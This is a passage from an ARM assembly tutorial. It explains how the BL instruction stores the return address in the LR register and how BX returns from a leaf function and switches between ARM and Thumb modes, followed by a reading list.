    Finally, it is important to understand the use of the BL and BX instructions here. In our example, we branched to a leaf function by using a BL instruction. We use the label of a function as a parameter to initiate branching. When the program is assembled and linked, the label gets replaced with a memory address. Before jumping to that location, the address of the next instruction is saved (linked) to the LR register so that we can return to where we left off when the function max is finished.

    The BX instruction, which is used to leave the leaf function, takes the LR register as a parameter. As mentioned earlier, before jumping to the function max the BL instruction saved the address of the next instruction of the function main into the LR register. Because the leaf function is not supposed to change the value of the LR register during its execution, this register can now be used to return to the parent (main) function. As explained in the previous chapter, the BX instruction can eXchange between the ARM and Thumb modes during the branching operation. In this case, it is done by inspecting the last bit of the LR register: if the bit is set to 1, the CPU will change (or keep) the mode to Thumb; if it’s set to 0, the mode will be changed (or kept) to ARM. This is a nice design feature which allows us to call functions from different modes.

    To take another perspective into functions and their internals we can examine the following animation which illustrates the inner workings of non-leaf and leaf functions.

FURTHER READING

1. Whirlwind Tour of ARM Assembly.
https://www.coranac.com/tonc/text/asm.htm

2. ARM assembler in Raspberry Pi.
http://thinkingeek.com/arm-assembler-raspberry-pi/

3. Practical Reverse Engineering: x86, x64, ARM, Windows Kernel, Reversing Tools, and Obfuscation by Bruce Dang, Alexandre Gazet, Elias Bachaalany and Sebastien Josse.

4. ARM Reference Manual.
http://infocenter.arm.com/help/topic/com.arm.doc.dui0068b/index.html

5. Assembler User Guide.
http://www.keil.com/support/man/docs/armasm/default.htm